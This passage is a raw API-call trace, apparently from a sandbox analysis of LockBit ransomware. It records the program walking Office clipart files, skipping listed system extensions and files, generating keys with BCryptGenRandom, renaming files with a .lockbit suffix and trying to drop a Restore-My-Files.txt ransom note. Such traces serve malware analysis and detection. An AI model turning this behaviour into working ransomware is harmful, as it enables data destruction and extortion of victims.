GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.998] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.004] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.004] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.005] free (_Block=0x1fa2ed8) [0176.006] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.006] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.006] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.006] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00916_.WMF", cAlternateFileName="")) returned 1 [0176.006] lstrcmpiW (lpString1=".", lpString2="SO00916_.WMF") returned -1 [0176.006] lstrcmpiW (lpString1="..", lpString2="SO00916_.WMF") returned -1 [0176.006] PathFindExtensionW (pszPath="SO00916_.WMF") returned=".WMF" [0176.006] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.006] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.007] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.007] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00916_.WMF") returned -1 [0176.008] lstrcmpiW (lpString1="ntldr", lpString2="SO00916_.WMF") returned -1 [0176.008] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00916_.WMF") returned -1 [0176.008] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00916_.WMF") returned -1 [0176.008] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00916_.WMF") returned -1 [0176.008] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00916_.WMF") returned 1 [0176.008] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00916_.WMF") returned -1 [0176.008] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.008] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF") returned=".WMF" [0176.008] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.008] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.009] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.010] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.010] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF.lockbit") returned 72 [0176.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00916_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.011] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.011] malloc (_Size=0x40068) returned 0x3df0008 [0176.011] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4720) returned 1 [0176.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.012] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.018] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.018] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.018] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.020] free (_Block=0x1fa2ed8) [0176.020] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.020] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.020] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x25ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00917_.WMF", cAlternateFileName="")) returned 1 [0176.020] lstrcmpiW (lpString1=".", lpString2="SO00917_.WMF") returned -1 [0176.020] lstrcmpiW (lpString1="..", lpString2="SO00917_.WMF") returned -1 [0176.020] PathFindExtensionW (pszPath="SO00917_.WMF") returned=".WMF" [0176.020] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.020] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.021] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.021] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00917_.WMF") returned -1 [0176.022] lstrcmpiW (lpString1="ntldr", lpString2="SO00917_.WMF") returned -1 [0176.022] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00917_.WMF") returned -1 [0176.022] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00917_.WMF") returned -1 [0176.022] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00917_.WMF") returned -1 [0176.022] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00917_.WMF") returned 1 [0176.022] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00917_.WMF") returned -1 [0176.022] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.022] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF") returned=".WMF" [0176.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.022] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.022] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.023] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.023] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF.lockbit") returned 72 [0176.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00917_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.025] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.025] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.025] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9644) returned 1 [0176.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.026] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.026] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.026] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.032] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.032] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.032] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.033] free (_Block=0x1fa2ed8) [0176.033] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.033] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.034] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00918_.WMF", cAlternateFileName="")) returned 1 [0176.034] lstrcmpiW (lpString1=".", lpString2="SO00918_.WMF") returned -1 [0176.034] lstrcmpiW (lpString1="..", lpString2="SO00918_.WMF") returned -1 [0176.034] PathFindExtensionW (pszPath="SO00918_.WMF") returned=".WMF" [0176.034] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.034] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.035] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.035] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.036] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00918_.WMF") returned -1 [0176.036] lstrcmpiW (lpString1="ntldr", lpString2="SO00918_.WMF") returned -1 [0176.036] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00918_.WMF") 